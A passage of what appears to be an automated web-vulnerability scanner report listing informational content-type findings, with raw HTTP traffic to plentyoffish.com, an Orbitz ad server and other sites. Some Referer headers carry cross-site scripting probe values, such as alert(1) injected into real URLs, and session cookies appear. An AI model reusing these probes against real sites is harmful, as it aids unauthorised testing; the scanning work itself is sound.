mbox=check#true#1296573897|session#1296573790873-999455#1296575697; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573845060:ss=1296573790782
Content-Length: 31

location=b&callingSource=HKW&_=

Response

29.78. http://www.plentyoffish.com/JpegImage.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/JpegImage.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg; charset=utf-8

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /JpegImage.aspx?nc=a&key=enhftrh2rwh40ylxbcdqkhlw&rand=321528&side=1 HTTP/1.1
Host: www.plentyoffish.com
Proxy-Connection: keep-alive
Referer: http://www.plentyoffish.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw; ft=Monday, January 31, 2011 5:25:37 PM; my_ipcountry=1; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; __utmc=9489908; __utmb=9489908.5.10.1296523584; __utmx=9489908.00012890560422417014:1:0-1-1-0; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmx_k_210735692=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 01 Feb 2011 01:29:05 GMT
Content-Type: image/jpeg; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 3527

......JFIF.....`.`.....C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......2...."..............................
...[SNIP]...

29.79. http://www.plentyoffish.com/accordian.pack.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/accordian.pack.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /accordian.pack.js HTTP/1.1
Host: www.plentyoffish.com
Proxy-Connection: keep-alive
Referer: http://www.plentyoffish.com/faq.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ft=Monday, January 31, 2011 5:25:37 PM; my_ipcountry=1; __utmz=9489908.1296527588.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; ASP.NET_SessionId=owu154wxdpyyj353a5vg5avm; __utmx=9489908.00012890560422417014:1:0-1-1-0; __utmxx=9489908.00012890560422417014:4130340:2592000; screen=1024; __utma=9489908.1831818404.1296523584.1296527588.1296915500.3; __utmc=9489908; __utmb=9489908.8.10.1296915500

Response

HTTP/1.1 200 OK
Content-Length: 1149
Content-Type: application/x-javascript
Last-Modified: Fri, 07 May 2010 22:37:54 GMT
Accept-Ranges: bytes
ETag: "eaf0ccee35eeca1:1157"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 14:19:58 GMT

//by dezinerfolio.com
eval((function(){a=". ..{3document5ById.Og.v..v=8..E!.&&E!K..32}o=E;E.;v=parseInt(2.E=o;3v.d.height=vHpx.}Oof.v.g.v.v=v/d.h;d.Dv;d.filterKalpha(D.+v*100H).Ob..z>0.z#-1:z-v90.E.;
...[SNIP]...

29.80. http://www.plentyoffish.com/member11499165.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member11499165.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /member11499165.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:33:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.81. http://www.plentyoffish.com/member1242943.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member1242943.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.82. http://www.plentyoffish.com/member16373418.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member16373418.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.83. http://www.plentyoffish.com/member19992238.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member19992238.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.84. http://www.plentyoffish.com/member22529971.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member22529971.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.85. http://www.plentyoffish.com/member22970699.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member22970699.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.86. http://www.plentyoffish.com/member23010679.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member23010679.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.87. http://www.plentyoffish.com/member23031204.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member23031204.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

29.88. http://www.plentyoffish.com/member23817184.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member23817184.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.89. http://www.plentyoffish.com/member24663198.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member24663198.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.90. http://www.plentyoffish.com/member24778333.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member24778333.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:35:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.91. http://www.plentyoffish.com/member25294614.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member25294614.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.92. http://www.plentyoffish.com/member25300504.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member25300504.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.93. http://www.plentyoffish.com/member25401489.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member25401489.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.94. http://www.plentyoffish.com/member25429166.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/member25429166.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.95. http://www.plentyoffish.com/needs_test.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/needs_test.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

29.96. http://www.plentyoffish.com/safety.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/safety.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /safety.aspx HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

29.97. http://www.plentyoffish.com/terms.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.plentyoffish.com
Path:	/terms.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17

Too many requests

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.revresda.com
Path:	/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=script&pos=middle&

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=script&pos=middle& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:46 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 84
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 84

document.write('<img src="/Marketing/Images/1x1.gif" border=0 height=1 width=1 />');

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.revresda.com
Path:	/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=script&pos=middle&

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=script&pos=middle& HTTP/1.1
Accept: */*
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x:expression(alert(1))%221333ba1041f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.revresda.com
Proxy-Connection: Keep-Alive
Cookie: NGUserID=aeb2124-3312-952975028-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:23:07 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 84
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 84

document.write('<img src="/Marketing/Images/1x1.gif" border=0 height=1 width=1 />');

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.revresda.com
Path:	/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=225&rotator=true&width=519&adType=script&

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.revresda.com
Path:	/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.revresda.com
Path:	/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:27 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1118
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/
Content-Length: 1118

var copy = 'Up to 30% off select Disney hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=disney&cnt=PKH'
var target = '_parent';
// target is '_top' for internal links, '_
...[SNIP]...

29.103. http://www.stocktrader.org.uk/remote2/ST1-1.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.stocktrader.org.uk
Path:	/remote2/ST1-1.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.104. http://www.techmynd.com/feed/atom/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.techmynd.com
Path:	/feed/atom/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /feed/atom/ HTTP/1.1
Host: www.techmynd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:05:17 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 02:18:48 GMT
Accept-Ranges: bytes
Content-Length: 36890
Vary: Accept-Encoding,Cookie
X-Pingback: http://www.techmynd.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="UTF-8"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:thr="http://purl.org/syndication/thread/1.0" xml:lang="en" xml:base="http://www.techmynd.com/wp-atom.php" ><title
...[SNIP]...

29.105. http://www.threatexpert.com/settings.xml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.threatexpert.com
Path:	/settings.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/xml

The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /settings.xml HTTP/1.1
Host: www.threatexpert.com
Proxy-Connection: keep-alive
Referer: http://www.threatexpert.com/chart.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0; __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=118387404

Response

HTTP/1.1 200 OK
Content-Length: 13705
Content-Type: text/xml
Last-Modified: Mon, 10 Dec 2007 12:05:16 GMT
Accept-Ranges: bytes
ETag: "0e6eeec243bc81:ca1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 16:29:42 GMT


<!-- This means, that if you are happy with this value, you can delete this li
...[SNIP]...

29.106. http://www.w3.org/TR/html4/strict.dtd previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.w3.org
Path:	/TR/html4/strict.dtd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /TR/html4/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

29.107. http://www.websitetoolbox.com/cgi/stat/js.cgi previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.websitetoolbox.com
Path:	/cgi/stat/js.cgi

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cgi/stat/js.cgi?username=acslinda&name=mainpage&domain_conflict=1 HTTP/1.1
Host: www.websitetoolbox.com
Proxy-Connection: keep-alive
Referer: http://www.worldmastiffforum.com/?d11e2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef6a009cb502=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sun, 06 Feb 2011 14:32:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 922

// due to a domain conflict js security error when a parent frame of a different domain is used
try {
   var wt_ref = top.document.referrer;
   var wt_doc_title = top.document.title;
   var wt_doct_location
...[SNIP]...

30. Content type is not specified previous next
There are 17 instances of this issue:

http://ad.reduxmedia.com/st
http://ad.yieldmanager.com/st
https://login.hitbox.com/dhtml.js,utility.js,cookie.js,helpers.js,dom_object_extensions.js,dom_selectbox.js,dom_autosuggest.js
https://login.hitbox.com/images/001982.banner_viralvideo_v1.hbx923x320.jpg
https://login.hitbox.com/images/bg_button.gif
https://login.hitbox.com/images/bg_footer_dash.gif
https://login.hitbox.com/images/bg_masthead.gif
https://login.hitbox.com/images/footer_graphic.gif
https://login.hitbox.com/images/icon_close_small.gif
https://login.hitbox.com/images/img_customer_service.gif
https://login.hitbox.com/images/logo_hbx_analytics.gif
https://login.hitbox.com/js/hbx.js
https://login.hitbox.com/login
https://login.hitbox.com/px.gif
https://login.hitbox.com/ss_style.css
http://millenniumhotels.tt.omtrdc.net/m2/millenniumhotels/mbox/standard
http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

30.1. http://ad.reduxmedia.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.reduxmedia.com
Path:	/st

Request

GET /st HTTP/1.1
Host: ad.reduxmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.2. http://ad.yieldmanager.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Request

GET /st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepage&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/n%3B228957569%3B0-0%3B0%3B45421688%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/dmd.ehow/homepage;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
